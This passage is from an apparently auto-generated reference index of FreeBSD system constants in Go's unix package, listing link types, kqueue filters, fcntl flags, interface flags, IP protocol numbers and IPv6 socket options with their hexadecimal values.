DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 472) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 473) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 474) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 475) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 476) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 477) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 478) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 479) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 480) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 481) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 482) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 483) | DLT_LAPD = 0xcb constant DLT_LIN (line 484) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 485) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 486) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 487) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 488) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 489) | DLT_LINUX_SLL = 0x71 constant DLT_LINUX_SLL2 (line 490) | DLT_LINUX_SLL2 = 0x114 constant DLT_LOOP (line 491) | DLT_LOOP = 0x6c constant DLT_LORATAP (line 492) | DLT_LORATAP = 0x10e constant DLT_LTALK (line 493) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 494) | DLT_MATCHING_MAX = 0x114 constant DLT_MATCHING_MIN (line 495) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 496) | DLT_MFR = 0xb6 constant DLT_MOST (line 497) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 498) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 499) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 500) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 501) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 502) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 503) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 504) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 505) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NETLINK (line 506) | DLT_NETLINK = 0xfd constant DLT_NFC_LLCP (line 507) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 508) | DLT_NFLOG = 0xef constant DLT_NG40 (line 509) | DLT_NG40 = 0xf4 constant DLT_NORDIC_BLE (line 510) | DLT_NORDIC_BLE = 0x110 constant DLT_NULL (line 511) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 512) | DLT_OPENFLOW = 0x10b constant DLT_PCI_EXP (line 513) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 514) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 515) | DLT_PFSYNC = 0x79 constant DLT_PKTAP (line 516) | DLT_PKTAP = 0x102 constant DLT_PPI (line 517) | DLT_PPI = 0xc0 constant DLT_PPP (line 518) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 519) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 520) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 521) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 522) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 523) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 524) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 525) | DLT_PRISM_HEADER = 0x77 constant DLT_PROFIBUS_DL (line 526) | DLT_PROFIBUS_DL = 0x101 constant DLT_PRONET (line 527) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 528) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 529) | DLT_RAW = 0xc constant DLT_RDS (line 530) | DLT_RDS = 0x109 constant DLT_REDBACK_SMARTEDGE (line 531) | DLT_REDBACK_SMARTEDGE = 0x20 constant DLT_RIO (line 532) | DLT_RIO = 0x7c constant DLT_RTAC_SERIAL (line 533) | DLT_RTAC_SERIAL = 0xfa constant DLT_SCCP (line 534) | DLT_SCCP = 0x8e constant DLT_SCTP (line 535) | DLT_SCTP = 0xf8 constant DLT_SDLC (line 536) | DLT_SDLC = 0x10c constant DLT_SITA (line 537) | DLT_SITA = 0xc4 constant DLT_SLIP (line 538) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 539) | DLT_SLIP_BSDOS = 0xd constant DLT_STANAG_5066_D_PDU (line 540) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 541) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 542) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TI_LLN_SNIFFER (line 543) | DLT_TI_LLN_SNIFFER = 0x10d constant DLT_TZSP (line 544) | DLT_TZSP = 0x80 constant DLT_USB (line 545) | DLT_USB = 0xba constant DLT_USBPCAP (line 546) | DLT_USBPCAP = 0xf9 constant DLT_USB_DARWIN (line 547) | DLT_USB_DARWIN = 0x10a constant DLT_USB_FREEBSD (line 548) | DLT_USB_FREEBSD = 0xba constant DLT_USB_LINUX (line 549) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 550) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 551) | DLT_USER0 = 0x93 constant DLT_USER1 (line 552) | DLT_USER1 = 0x94 constant DLT_USER10 (line 553) | DLT_USER10 = 0x9d constant DLT_USER11 (line 554) | DLT_USER11 = 0x9e constant DLT_USER12 (line 555) | DLT_USER12 = 0x9f constant DLT_USER13 (line 556) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 557) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 558) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 559) | DLT_USER2 = 0x95 constant DLT_USER3 (line 560) | DLT_USER3 = 0x96 constant DLT_USER4 (line 561) | DLT_USER4 = 0x97 constant DLT_USER5 (line 562) | DLT_USER5 = 0x98 constant DLT_USER6 (line 563) | DLT_USER6 = 0x99 constant DLT_USER7 (line 564) | DLT_USER7 = 0x9a constant DLT_USER8 (line 565) | DLT_USER8 = 0x9b constant DLT_USER9 (line 566) | DLT_USER9 = 0x9c constant DLT_VSOCK (line 567) | DLT_VSOCK = 0x10f constant DLT_WATTSTOPPER_DLM (line 568) | DLT_WATTSTOPPER_DLM = 0x107 constant DLT_WIHART (line 569) | DLT_WIHART = 0xdf constant DLT_WIRESHARK_UPPER_PDU (line 570) | DLT_WIRESHARK_UPPER_PDU = 0xfc constant DLT_X2E_SERIAL (line 571) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 572) | DLT_X2E_XORAYA = 0xd6 constant DLT_ZWAVE_R1_R2 (line 573) | DLT_ZWAVE_R1_R2 = 0x105 constant DLT_ZWAVE_R3 (line 574) | DLT_ZWAVE_R3 = 0x106 constant DT_BLK (line 575) | DT_BLK = 0x6 constant DT_CHR (line 576) | DT_CHR = 0x2 constant DT_DIR (line 577) | DT_DIR = 0x4 constant DT_FIFO (line 578) | DT_FIFO = 0x1 constant DT_LNK (line 579) | DT_LNK = 0xa constant DT_REG (line 580) | DT_REG = 0x8 constant DT_SOCK (line 581) | DT_SOCK = 0xc constant DT_UNKNOWN (line 582) | DT_UNKNOWN = 0x0 constant DT_WHT (line 583) | DT_WHT = 0xe constant ECHO (line 584) | ECHO = 0x8 constant ECHOCTL (line 585) | ECHOCTL = 0x40 constant ECHOE (line 586) | ECHOE = 0x2 constant ECHOK (line 587) | ECHOK = 0x4 constant ECHOKE (line 588) | ECHOKE = 0x1 constant ECHONL (line 589) | ECHONL = 0x10 constant ECHOPRT (line 590) | ECHOPRT = 0x20 constant EVFILT_AIO (line 591) | EVFILT_AIO = -0x3 constant EVFILT_EMPTY (line 592) | EVFILT_EMPTY = -0xd constant EVFILT_FS (line 593) | EVFILT_FS = -0x9 constant EVFILT_LIO (line 594) | EVFILT_LIO = -0xa constant EVFILT_PROC (line 595) | EVFILT_PROC = -0x5 constant EVFILT_PROCDESC (line 596) | EVFILT_PROCDESC = -0x8 constant EVFILT_READ (line 597) | EVFILT_READ = -0x1 constant EVFILT_SENDFILE (line 598) | EVFILT_SENDFILE = -0xc constant EVFILT_SIGNAL (line 599) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 600) | EVFILT_SYSCOUNT = 0xd constant EVFILT_TIMER (line 601) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 602) | EVFILT_USER = -0xb constant EVFILT_VNODE (line 603) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 604) | EVFILT_WRITE = -0x2 constant EVNAMEMAP_NAME_SIZE (line 605) | EVNAMEMAP_NAME_SIZE = 0x40 constant EV_ADD (line 606) | EV_ADD = 0x1 constant EV_CLEAR (line 607) | EV_CLEAR = 0x20 constant EV_DELETE (line 608) | EV_DELETE = 0x2 constant EV_DISABLE (line 609) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 610) | EV_DISPATCH = 0x80 constant EV_DROP (line 611) | EV_DROP = 0x1000 constant EV_ENABLE (line 612) | EV_ENABLE = 0x4 constant EV_EOF (line 613) | EV_EOF = 0x8000 constant EV_ERROR (line 614) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 615) | EV_FLAG1 = 0x2000 constant EV_FLAG2 (line 616) | EV_FLAG2 = 0x4000 constant EV_FORCEONESHOT (line 617) | EV_FORCEONESHOT = 0x100 constant EV_ONESHOT (line 618) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 619) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 620) | EV_SYSFLAGS = 0xf000 constant EXTA (line 621) | EXTA = 0x4b00 constant EXTATTR_MAXNAMELEN (line 622) | EXTATTR_MAXNAMELEN = 0xff constant EXTATTR_NAMESPACE_EMPTY (line 623) | EXTATTR_NAMESPACE_EMPTY = 0x0 constant EXTATTR_NAMESPACE_SYSTEM (line 624) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 625) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 626) | EXTB = 0x9600 constant EXTPROC (line 627) | EXTPROC = 0x800 constant FD_CLOEXEC (line 628) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 629) | FD_SETSIZE = 0x400 constant FLUSHO (line 630) | FLUSHO = 0x800000 constant F_CANCEL (line 631) | F_CANCEL = 0x5 constant F_DUP2FD (line 632) | F_DUP2FD = 0xa constant F_DUP2FD_CLOEXEC (line 633) | F_DUP2FD_CLOEXEC = 0x12 constant F_DUPFD (line 634) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 635) | F_DUPFD_CLOEXEC = 0x11 constant F_GETFD (line 636) | F_GETFD = 0x1 constant F_GETFL (line 637) | F_GETFL = 0x3 constant F_GETLK (line 638) | F_GETLK = 0xb constant F_GETOWN (line 639) | F_GETOWN = 0x5 constant F_OGETLK (line 640) | F_OGETLK = 0x7 constant F_OK (line 641) | F_OK = 0x0 constant F_OSETLK (line 642) | F_OSETLK = 0x8 constant F_OSETLKW (line 643) | F_OSETLKW = 0x9 constant F_RDAHEAD (line 644) | F_RDAHEAD = 0x10 constant F_RDLCK (line 645) | F_RDLCK = 0x1 constant F_READAHEAD (line 646) | F_READAHEAD = 0xf constant F_SETFD (line 647) | F_SETFD = 0x2 constant F_SETFL (line 648) | F_SETFL = 0x4 constant F_SETLK (line 649) | F_SETLK = 0xc constant F_SETLKW (line 650) | F_SETLKW = 0xd constant F_SETLK_REMOTE (line 651) | F_SETLK_REMOTE = 0xe constant F_SETOWN (line 652) | F_SETOWN = 0x6 constant F_UNLCK (line 653) | F_UNLCK = 0x2 constant F_UNLCKSYS (line 654) | F_UNLCKSYS = 0x4 constant F_WRLCK (line 655) | F_WRLCK = 0x3 constant HUPCL (line 656) | HUPCL = 0x4000 constant HW_MACHINE (line 657) | HW_MACHINE = 0x1 constant ICANON (line 658) | ICANON = 0x100 constant ICMP6_FILTER (line 659) | ICMP6_FILTER = 0x12 constant ICRNL (line 660) | ICRNL = 0x100 constant IEXTEN (line 661) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 662) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 663) | IFAN_DEPARTURE = 0x1 constant IFCAP_WOL_MAGIC (line 664) | IFCAP_WOL_MAGIC = 0x2000 constant IFF_ALLMULTI (line 665) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 666) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 667) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 668) | IFF_CANTCHANGE = 0x218f52 constant IFF_CANTCONFIG (line 669) | IFF_CANTCONFIG = 0x10000 constant IFF_DEBUG (line 670) | IFF_DEBUG = 0x4 constant IFF_DRV_OACTIVE (line 671) | IFF_DRV_OACTIVE = 0x400 constant IFF_DRV_RUNNING (line 672) | IFF_DRV_RUNNING = 0x40 constant IFF_DYING (line 673) | IFF_DYING = 0x200000 constant IFF_LINK0 (line 674) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 675) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 676) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 677) | IFF_LOOPBACK = 0x8 constant IFF_MONITOR (line 678) | IFF_MONITOR = 0x40000 constant IFF_MULTICAST (line 679) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 680) | IFF_NOARP = 0x80 constant IFF_NOGROUP (line 681) | IFF_NOGROUP = 0x800000 constant IFF_OACTIVE (line 682) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 683) | IFF_POINTOPOINT = 0x10 constant IFF_PPROMISC (line 684) | IFF_PPROMISC = 0x20000 constant IFF_PROMISC (line 685) | IFF_PROMISC = 0x100 constant IFF_RENAMING (line 686) | IFF_RENAMING = 0x400000 constant IFF_RUNNING (line 687) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 688) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 689) | IFF_STATICARP = 0x80000 constant IFF_UP (line 690) | IFF_UP = 0x1 constant IFNAMSIZ (line 691) | IFNAMSIZ = 0x10 constant IFT_BRIDGE (line 692) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 693) | IFT_CARP = 0xf8 constant IFT_IEEE1394 (line 694) | IFT_IEEE1394 = 0x90 constant IFT_INFINIBAND (line 695) | IFT_INFINIBAND = 0xc7 constant IFT_L2VLAN (line 696) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 697) | IFT_L3IPVLAN = 0x88 constant IFT_PPP (line 698) | IFT_PPP = 0x17 constant IFT_PROPVIRTUAL (line 699) | IFT_PROPVIRTUAL = 0x35 constant IGNBRK (line 700) | IGNBRK = 0x1 constant IGNCR (line 701) | IGNCR = 0x80 constant IGNPAR (line 702) | IGNPAR = 0x4 constant IMAXBEL (line 703) | IMAXBEL = 0x2000 constant INLCR (line 704) | INLCR = 0x40 constant INPCK (line 705) | INPCK = 0x10 constant IN_CLASSA_HOST (line 706) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 707) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 708) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 709) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 710) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 711) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 712) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 713) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 714) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 715) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 716) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 717) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 718) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 719) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 720) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_MASK (line 721) | IN_RFC3021_MASK = 0xfffffffe constant IPPROTO_3PC (line 722) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 723) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 724) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 725) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 726) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 727) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 728) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 729) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 730) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 731) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CARP (line 732) | IPPROTO_CARP = 0x70 constant IPPROTO_CFTP (line 733) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 734) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 735) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 736) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 737) | IPPROTO_CPNX = 0x48 constant IPPROTO_DCCP (line 738) | IPPROTO_DCCP = 0x21 constant IPPROTO_DDP (line 739) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 740) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 741) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 742) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 743) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 744) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 745) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 746) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 747) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 748) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 749) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 750) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 751) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 752) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 753) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 754) | IPPROTO_HELLO = 0x3f constant IPPROTO_HIP (line 755) | IPPROTO_HIP = 0x8b constant IPPROTO_HMP (line 756) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 757) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 758) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 759) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 760) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 761) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 762) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 763) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 764) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 765) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 766) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 767) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 768) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 769) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 770) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 771) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 772) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 773) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 774) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 775) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 776) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 777) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 778) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 779) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 780) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 781) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 782) | IPPROTO_MAX = 0x100 constant IPPROTO_MEAS (line 783) | IPPROTO_MEAS = 0x13 constant IPPROTO_MH (line 784) | IPPROTO_MH = 0x87 constant IPPROTO_MHRP (line 785) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 786) | IPPROTO_MICP = 0x5f constant IPPROTO_MOBILE (line 787) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 788) | IPPROTO_MPLS = 0x89 constant IPPROTO_MTP (line 789) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 790) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 791) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 792) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 793) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 794) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 795) | IPPROTO_NVPII = 0xb constant IPPROTO_OLD_DIVERT (line 796) | IPPROTO_OLD_DIVERT = 0xfe constant IPPROTO_OSPFIGP (line 797) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PFSYNC (line 798) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PGM (line 799) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 800) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 801) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 802) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 803) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 804) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 805) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 806) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 807) | IPPROTO_RDP = 0x1b constant IPPROTO_RESERVED_253 (line 808) | IPPROTO_RESERVED_253 = 0xfd constant IPPROTO_RESERVED_254 (line 809) | IPPROTO_RESERVED_254 = 0xfe constant IPPROTO_ROUTING (line 810) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 811) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 812) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 813) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 814) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 815) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 816) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 817) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEND (line 818) | IPPROTO_SEND = 0x103 constant IPPROTO_SHIM6 (line 819) | IPPROTO_SHIM6 = 0x8c constant IPPROTO_SKIP (line 820) | IPPROTO_SKIP = 0x39 constant IPPROTO_SPACER (line 821) | IPPROTO_SPACER = 0x7fff constant IPPROTO_SRPC (line 822) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 823) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 824) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 825) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 826) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 827) | IPPROTO_TCP = 0x6 constant IPPROTO_TLSP (line 828) | IPPROTO_TLSP = 0x38 constant IPPROTO_TP (line 829) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 830) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 831) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 832) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 833) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 834) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 835) | IPPROTO_UDPLITE = 0x88 constant IPPROTO_VINES (line 836) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 837) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 838) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 839) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 840) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 841) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 842) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 843) | IPPROTO_XTP = 0x24 constant IPV6_AUTOFLOWLABEL (line 844) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDANY (line 845) | IPV6_BINDANY = 0x40 constant IPV6_BINDMULTI (line 846) | IPV6_BINDMULTI = 0x41 constant IPV6_BINDV6ONLY (line 847) | IPV6_BINDV6ONLY = 0x1b constant IPV6_CHECKSUM (line 848) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 849) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 850) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 851) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 852) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 853) | IPV6_DSTOPTS = 0x32 constant IPV6_FLOWID (line 854) | IPV6_FLOWID = 0x43 constant IPV6_FLOWINFO_MASK (line 855) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_LEN (line 856) | IPV6_FLOWLABEL_LEN = 0x14 constant IPV6_FLOWLABEL_MASK (line 857) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOWTYPE (line 858) | IPV6_FLOWTYPE = 0x44 constant IPV6_FRAGTTL (line 859) | IPV6_FRAGTTL = 0x78 constant IPV6_FW_ADD (line 860) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 861) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 862) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 863) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 864) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 865) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 866) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 867) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 868) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 869) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 870) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 871) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 872) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 873) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 874) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 875) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 876) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MMTU (line 877) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 878) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 879) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 880) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 881) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 882) | IPV6_NEXTHOP = 0x30 constant IPV6_ORIGDSTADDR (line 883) | IPV6_ORIGDSTADDR = 0x48 constant IPV6_PATHMTU (line 884) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 885) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 886) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 887) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 888) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 889) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR 